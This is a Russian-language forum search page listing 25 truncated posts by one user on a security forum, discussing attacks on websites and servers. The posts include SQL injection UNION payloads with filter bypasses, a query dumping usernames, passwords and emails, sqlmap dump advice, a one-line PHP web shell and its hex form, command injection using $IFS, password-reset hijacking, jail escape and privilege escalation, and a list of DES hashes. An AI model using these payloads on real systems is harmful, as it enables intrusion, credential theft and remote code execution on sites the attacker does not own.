Вернуться   RDot: White Hat Security Community > Поиск по форуму

Показано с 1 по 25 из 64.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: Tim
Раздел: Web-среда/Web-applications 02.06.2018, 00:21
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Нельзя, но можно залить шел...

Нельзя, но можно залить шел через скулю.
Раздел: Web-среда/Web-applications 19.12.2015, 12:36
Ответов: 2
Просмотров: 14,175
Автор Tim
chroot, jail ядерным сплойтом

chroot, jail

ядерным сплойтом
Раздел: Повышение привилегий/Privilege escalation 23.11.2015, 00:22
Ответов: 1
Просмотров: 15,684
Автор Tim
Есть что-то рабочее на эту...

Есть что-то рабочее на эту багу?

Проверял POС на FreeBSD 9.1-RELEASE #0 r243825 amd64
Второй POС ребутит систему,
а третий...
Раздел: Web-среда/Web-applications 01.11.2015, 00:07
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Вопрос, как выйти из Jail? ...

Вопрос, как выйти из Jail?


Рут добывается с помощью http://pastebin.com/mvrVAtJw
https://rdot.org/forum/showthread.php?t=2775
Раздел: Повышение привилегий/Privilege escalation 31.10.2015, 22:29
Ответов: 17
Просмотров: 39,297
Автор Tim
Причина подобного lose its SUID....

Причина подобного lose its SUID. В описании подсказка:

Решение:
поменять таргет
Раздел: Целевые системы/Target systems 30.08.2015, 23:20
Ответов: 1
Просмотров: 21,443
Автор Tim
кластер

кластер
Раздел: Web-среда/Web-applications 29.05.2015, 16:20
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Редактирование файлов тем,...

Редактирование файлов тем, плагинов. Возможно на какие-то из файлов будут права.
Раздел: Web-среда/Web-applications 03.05.2015, 23:54
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
select concat_ws(0x3a,username,password,email)...

select concat_ws(0x3a,username,password,email) from database.table_user limit 0,1000
Раздел: Web-среда/Web-applications 01.05.2015, 14:04
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
https://github.com/sqlmapproject/sqlmap/wiki/Usage...

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Смотри в сторону --dump, --sql-shell тебе не нужен
Раздел: Web-среда/Web-applications 17.04.2015, 18:19
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Разбей файл на мелкие...

Разбей файл на мелкие куски, отредактируй нужный и собери обратно в большой файл

Разбиваем file на куски по...
Раздел: Повышение привилегий/Privilege escalation 01.02.2015, 07:40
Ответов: 1,219
Просмотров: 1,486,686
Автор Tim
Подскажите, патченный staprun...

Подскажите, патченный staprun или я что-то не так делаю?

sh-3.2$ ls -lha /usr/bin/staprun
---s--x--x 1 root root 42K May 24 2008 /usr/bin/staprun

sh-3.2$...
Раздел: Сценарии/CMF/СMS 25.09.2014, 14:16
Ответов: 6
Просмотров: 24,482
Автор Tim
Сделать восстановление...

Сделать восстановление пароля, вытащить ключ для восстановления, поменять на свой. Учти только то, что на...
Раздел: Web-среда/Web-applications 08.05.2014, 10:34
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Вывода ошибок нет. Путей...

Вывода ошибок нет. Путей тоже нет.
Проверить работу COPY не могу, т.к. нельзя сделать выборку при помощи SELECT FROM....
Раздел: Web-среда/Web-applications 08.05.2014, 07:51
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Да, если в запросе...

Да, если в запросе присутсвует SELECT и FROM, тогда срабатывает фильтр.
Сервер вообще не возвращает ответ:...
Раздел: Web-среда/Web-applications 04.05.2014, 18:37
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Есть варианты обхода...

Есть варианты обхода фильтра в postgress?

true
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL+/*f-rom+information_schema.columns*/--
...
Раздел: Сценарии/CMF/СMS 25.03.2014, 18:13
Ответов: 75
Просмотров: 227,577
Автор Tim
iDevAffiliate Version 7.1 Кто-нибудь...

iDevAffiliate Version 7.1
Кто-нибудь смог залиться?
Файлы можно загружать, но проверка расширения портит все.
file.php.pdf к...
Раздел: Криптография/Cryptography 02.02.2014, 18:30
Ответов: 919
Просмотров: 936,515
Автор Tim
DES jNJ0JuKffVISw Z.1jXEWZ9oNGs ...

DES
jNJ0JuKffVISw
Z.1jXEWZ9oNGs
gIvmg6EVRREEw
2gw0GiEeF5GNo
kz5q2r99Y73rk
Раздел: Web-среда/Web-applications 21.12.2013, 09:38
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
из information_schema инфу выводит,...

из information_schema инфу выводит, а с рабочей базы не хочет
good query


error query


без разницы через что, одна и таже...
Раздел: Web-среда/Web-applications 20.12.2013, 22:34
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
hi all Mysql 5.5.34-cll ...

hi all
Mysql 5.5.34-cll

lower_case_table_names=0
Т.е. название таблиц регистро зависимо.

Уязвимый параметр переводится в...
Раздел: Web-среда/Web-applications 14.10.2013, 00:52
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
вырежи из запроса...

вырежи из запроса /*<?@system($_GET[cmd])?>*/
это я тебе показал что в хексе 0x3C3F4073797374656D28245F4745545B636D645D293F3E
Раздел: Web-среда/Web-applications 13.10.2013, 07:46
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Создай сразу шелл ...

Создай сразу шелл ...
Раздел: Web-среда/Web-applications 11.10.2013, 05:25
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Eсть возможность записи в...

Eсть возможность записи в конфиг /etc/redis.conf, что можно придумать, чтобы поднять права?
Раздел: Web-среда/Web-applications 26.09.2013, 23:17
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
ls$IFS-la

ls$IFS-la
Раздел: Web-среда/Web-applications 25.07.2013, 18:42
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
Что-нибудь типа LOAD DATA INFILE...

Что-нибудь типа LOAD DATA INFILE '/tmp/test.txt' INTO TABLE test
можно выполнить?
Чтоб обновить данные в таблицах.
Поискать может...
Раздел: Web-среда/Web-applications 02.07.2013, 17:02
Ответов: 3,619
Просмотров: 3,936,623
Автор Tim
trololoman96 ничего. смотри...

trololoman96 ничего. смотри плагины. зачастую они не используют функционал wp для фильтрации, потому встречаются...
Показано с 1 по 25 из 64.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot